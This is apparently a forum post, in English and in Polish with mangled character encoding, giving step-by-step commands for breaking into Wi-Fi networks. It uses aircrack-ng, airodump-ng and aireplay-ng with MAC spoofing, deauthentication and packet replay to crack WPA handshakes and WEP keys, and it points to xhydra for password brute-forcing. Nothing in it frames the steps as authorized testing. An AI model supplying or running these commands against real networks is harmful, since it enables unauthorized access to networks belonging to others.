Steps : 1. airmon-ng stop wlan0 2. ifconfig wlan0 down 3. macchanger –mac 00:11:22:33:44:55 wlan0 4. airmon-ng start wlan0 5. airodump-ng wlan0 6. airodump-ng -c (channel) -w (file name WPA) –bssid (bssid) wlan0 7. aireplay-ng -0 5 -a (bssid)wlan0 8. aircrack-ng (filename-01.cap)-w (dictionary location) 9. and you are done! pentest/wireless/aircrack-ng/test/password.lst http://blog.iredlof.com/2009/04/crack-wpa-with-backtrack-3/ Potrzebne: - karta sieciowa, która umo¿liwia monitorowanie - aircrack-ng - macchanger - komputer - sieæ zabezpieczona WEP Nale¿y ustawiæ kartê w tryb monitorowania. Ew. mo¿emy zmieniæ adres MAC ifconfig wlan0 down iwconfig wlan0 mode monitor ifconfig wlan0 up Otwieramy terminal/konsolê i skrobiemy airodump-ng wlan0 Wyœwietli nam siê lista sieci, program zabijamy Ctrl+C (informacje potrzebne to: BSSID i kana³) nastêpnie nale¿y wydaæ polecenie: (gdzie za XX wpisujemy kana³, a za XX:XX:XX:XX:XX:XX bssid sieci) airodump-ng -c XX -w wifi ––bssid XX:XX:XX:XX:XX:XX wlan0 teraz otwieramy kolejne okno konsoli i wydajemy polecenie: aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h 00:00:00:00:00:00 wlan0 (w miejsce zer wpisujemy nasz adres MAC) teraz pakiety zapisuj¹ nam siê do pliku wifi-01.cap i z niego bêdziemy wyci¹gaæ klucz WEP. W tym celu w kolejnym oknie konsoli wydajemy polecenie: aircrack-ng -b XX:XX:XX:XX:XX:XX wifi-01.cap Teraz czekamy. Czas oczekiwania mo¿e byæ ró¿ny. Naturalnie w ca³ym poradniku zamiast wlan0 wstawiamy odpowiedni interfejs sieciowy. Wiêc tak poczytajcie tuta z jak z³¹maæ wep i komende --help lub prosciej w backtracku w uruchom wpisujemy "xhydra" i tam damy sobie rade bo to program graficzny :)
Jaszczurka1